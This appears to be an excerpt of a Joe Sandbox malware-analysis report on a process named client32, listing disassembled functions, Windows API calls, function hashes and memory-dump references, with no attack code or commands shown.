Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ec3c969e10003a4ab4fcd39709e582f3b98fac94c7fb781fbdef8f660fee8434
Instruction ID: 924decae14a629f733ede0bb622a477ce8d6e199e6b7b916e29b3dd74e49d163
Opcode Fuzzy Hash: ec3c969e10003a4ab4fcd39709e582f3b98fac94c7fb781fbdef8f660fee8434
Instruction Fuzzy Hash: 1811573E404317AFCBD22FB09944A6DFB9A9B423F8B214425F9298A140EF71D840CB92

Function 00401020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00401024
GetStartupInfoA.KERNEL32(?), ref: 00401079
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0000000A), ref: 0040109C
ExitProcess.KERNEL32 ref: 004010A9

Memory Dump Source

Source File: 00000007.00000002.3638445121.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3638427287.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3638462516.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3638481461.0000000000404000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_client32.jbxd

Yara matches

Similarity

API ID: CommandExitHandleInfoLineModuleProcessStartup
String ID:
API String ID: 2164999147-0
Opcode ID: 14085ec075f93681cd44e9da420e50c529999ece7765cc5c856b362def1b15a9
Instruction ID: f614a552efd759633e5898ba04cf1d4763a2e92f88735b9f7b762142f34247ec
Opcode Fuzzy Hash: 14085ec075f93681cd44e9da420e50c529999ece7765cc5c856b362def1b15a9
Instruction Fuzzy Hash: BC1182201083C19AEB311F248A847AB6F959F03745F14047AE8D677AA6D27E88C7862D

Function 68597E39 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(685DB898,?,?,?,00000000), ref: 68597EB7
LeaveCriticalSection.KERNEL32(685DB898,?,?,?,00000000), ref: 68597ED0

Strings

b, xrefs: 68597EA2
RESULT, xrefs: 68597E40

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: RESULT$b
API String ID: 3168844106-4141403093
Opcode ID: 344ab9fa620dcd36a6245c9c9c2d44656570f2105c60666b4b785c9064d4d4c2
Instruction ID: e36ac40c6bb355f4d0b958ebb63bcc38157700e48bf6b0e4c0bd3a5a7db64925
Opcode Fuzzy Hash: 344ab9fa620dcd36a6245c9c9c2d44656570f2105c60666b4b785c9064d4d4c2
Instruction Fuzzy Hash: E31125B5D01209AEDF11DFA4C8457AEBBF5FB48304F40406AD819E6240E7355A549BA6

Function 11131380 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000029,00000154,?,00000000), ref: 111313B1
CreateFontIndirectA.GDI32(?), ref: 111313CF
CreateFontIndirectA.GDI32(?), ref: 111313E5
CreateFontIndirectA.GDI32(FFFFFFF0), ref: 111313FB

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFontIndirect$InfoParametersSystem
String ID:
API String ID: 3386289337-0
Opcode ID: cddf9315703bad504045fd98c9e1cfe8d04d1f92840bc27388ccda177a2b43ee
Instruction ID: e4efc710e3e979ce8ff1f48ebad8b7127cba25ea1afedff09802414c266bcb73
Opcode Fuzzy Hash: cddf9315703bad504045fd98c9e1cfe8d04d1f92840bc27388ccda177a2b43ee
Instruction Fuzzy Hash: 92015E719007189BD7A0DFA9DC44BDAF7F9AB84310F1042AAD519A6290DB706988CF51

Function 685980D0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(685DB898,?), ref: 6859812C
LeaveCriticalSection.KERNEL32(685DB898), ref: 68598141

Strings

a3Zh, xrefs: 685980D7
RESULT, xrefs: 685980F0

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: RESULT$a3Zh
API String ID: 3168844106-3818967759
Opcode ID: 1916ae29f21829a5021a9e567ad8a8e9baf75ae41c15dc09188afa1b625017e2
Instruction ID: f8c136c1981860d98b2b961d25e3bf584bcdf222b6e41de574f74e6c2b3f08e7
Opcode Fuzzy Hash: 1916ae29f21829a5021a9e567ad8a8e9baf75ae41c15dc09188afa1b625017e2
Instruction Fuzzy Hash: 8EF022F7C442407FEF109A69AC45BAF7AACDB81294FC20062ED4A83101E734AD4082B7

Function 68595B30 Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(685DB898), ref: 68595B45
LeaveCriticalSection.KERNEL32(685DB898), ref: 68595B76
SetEvent.KERNEL32(00000304), ref: 68595B8E
LeaveCriticalSection.KERNEL32(685DB898), ref: 68595B99

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: dc7f8f2d0725482f5796ff0361690898635498e31261805ba8a913a6cafe9f0f
Instruction ID: 071c74552bd03b6e2a2130df725f45ac1fbb8cf9912f83ab9758053b877d1ed6
Opcode Fuzzy Hash: dc7f8f2d0725482f5796ff0361690898635498e31261805ba8a913a6cafe9f0f
Instruction Fuzzy Hash: E8F062325441A5FFCF11EFA884084DD7B76E6063667838446ED5B57501D720A845CBAA

Function 68595AC0 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(685DB898), ref: 68595AD0
_memmove.LIBCMT ref: 68595AEC
_memmove.LIBCMT ref: 68595B0A
LeaveCriticalSection.KERNEL32(685DB898), ref: 68595B17

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection_memmove$EnterLeave
String ID:
API String ID: 324922381-0
Opcode ID: ad1d9fc5d26844ab90e6abc2080e6ac3a119d1f65c14e4a216e3bf781054fb0d
Instruction ID: 8a9ef9100a8dac2c4e2a8152beff8e895988585c8f0ee727ee4c4f6bdf572ad7
Opcode Fuzzy Hash: ad1d9fc5d26844ab90e6abc2080e6ac3a119d1f65c14e4a216e3bf781054fb0d
Instruction Fuzzy Hash: 40F05E79601110AFEE50AB68D881CAE37AADA857123958419FC1597300D630EC418BAE

Function 110071D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 11007327
SetFocus.USER32(?), ref: 11007383

Strings

edit, xrefs: 11007321

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFocusWindow_memsetwsprintf
String ID: edit
API String ID: 133491855-2167791130
Opcode ID: f65e150b113dac071697823f5246cea45f0e0d9d2d8fe942133c289e5f9292e4
Instruction ID: f78834b4020d8e2e6f829c6f5032a1a8cba214c943ee8e0f2be50220b25a4479
Opcode Fuzzy Hash: f65e150b113dac071697823f5246cea45f0e0d9d2d8fe942133c289e5f9292e4
Instruction Fuzzy Hash: 4851B0B5A00606AFE741CFA8DC80BABB7E5FB48354F11856DF995C7340EA34A942CB61

Function 1103F270 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170COMMON

Download Yara Rule

APIs

Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004C), ref: 110948BE
Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004D), ref: 110948C7
Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004E), ref: 110948CE
Part of subcall function 110948B0: GetSystemMetrics.USER32(00000000), ref: 110948D7
Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004F), ref: 110948DD
Part of subcall function 110948B0: GetSystemMetrics.USER32(00000001), ref: 110948E5

GetRegionData.GDI32(?,00001000,?), ref: 1103F2D5

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 1103F455, 1103F48A
IsA(), xrefs: 1103F45A, 1103F48F

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsSystem$DataErrorExitLastMessageProcessRegionwsprintf
String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
API String ID: 1231476184-2270926670
Opcode ID: bcf8010bd49bb8a48e5ff97e5ecb267e14ecb5a38bedc9232b3b103d8f10203e
Instruction ID: 7bd6763c5981859c823165d8063a1c4bf52d6bb4432795ccb6ce09120d22f5b2
Opcode Fuzzy Hash: bcf8010bd49bb8a48e5ff97e5ecb267e14ecb5a38bedc9232b3b103d8f10203e
Instruction Fuzzy Hash: C2613DB5E001AA9FCB24CF54CD84ADDF3B5BF88304F0082D9E689A7244DAB46E85CF51

Function 6859FB60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6859FBD5
_memmove.LIBCMT ref: 6859FC26

Part of subcall function 6859F470: std::_Xinvalid_argument.LIBCPMT ref: 6859F48A

Strings

string too long, xrefs: 6859FBD0

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 4b1b0a5c2d314a93db9e7b30bd2ab505b0c726ea5d84bbc897fd3a60dfd08950
Instruction ID: 5be6adab8e1debc6640840de9a6675ea764e7126c5b5105fc23bea4dd9401dc0
Opcode Fuzzy Hash: 4b1b0a5c2d314a93db9e7b30bd2ab505b0c726ea5d84bbc897fd3a60dfd08950
Instruction Fuzzy Hash: 453128323046909BDB208E5CE8A0A6AF7EEEF95764BA0491FF491C7640C7F1DC4183A1

Function 11009220 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11009295
_memmove.LIBCMT ref: 110092E6

Part of subcall function 11008D80: std::_Xinvalid_argument.LIBCPMT ref: 11008D9A

Strings

string too long, xrefs: 11009290

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 91e1c889b45ef3916207e9bff09e53fb613e1cc83fc8da0f74f3339f2b8fe869
Instruction ID: be305049c21c6d802d82ad86ff43ec2f0153ea4b5fc4fe3555ff5b1edb8d11a0
Opcode Fuzzy Hash: 91e1c889b45ef3916207e9bff09e53fb613e1cc83fc8da0f74f3339f2b8fe869
Instruction Fuzzy Hash: 0A31DB32F046109BF720DD9CE88095AF7EDEFA57A4B20462FE58AC7740EB719C4487A0

Function 11143250 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00000400,?,00000000,00000000,?,00000401,?,?,?,?), ref: 111432DB
wvsprintfA.USER32(?,?,?), ref: 111432F2

Strings

ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>, xrefs: 1114330A

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FormatMessagewvsprintf
String ID: ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>
API String ID: 65494530-3330918973
Opcode ID: 4f255fee6f7a36d2343be92b14a67b8c036efb71b9771a05c8b56e11d64a2540
Instruction ID: 325346ff02c3342125f3bb2915ef43e6aa784d2796c19ba5a5be54d08933bc26
Opcode Fuzzy Hash: 4f255fee6f7a36d2343be92b14a67b8c036efb71b9771a05c8b56e11d64a2540
Instruction Fuzzy Hash: DA21B6B1D1422DAED710CB94DC81FEFFBBCEB44614F104169EA0993240DB75AA84CBA5

Function 1100F0F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1100F10B

Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE

std::_Xinvalid_argument.LIBCPMT ref: 1100F122

Strings

string too long, xrefs: 1100F106, 1100F11D

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: ac563746f8d289c4c30f2701c9d81f44c6154b7c84ff09c16f1d9c640ce089b7
Instruction ID: 820ae926dfc744509ffc298ffbf7719e1583de006a97f4842800b066cd7400cd
Opcode Fuzzy Hash: ac563746f8d289c4c30f2701c9d81f44c6154b7c84ff09c16f1d9c640ce089b7
Instruction Fuzzy Hash: BA11D632B046145BE321DD5CE880BAAF7EDEF966A4F10066FF591CB640CBA1A80593A1

Function 685A8BD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 685A8C18
_memmove.LIBCMT ref: 685A8C6A

Strings

@, xrefs: 685A8C42

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
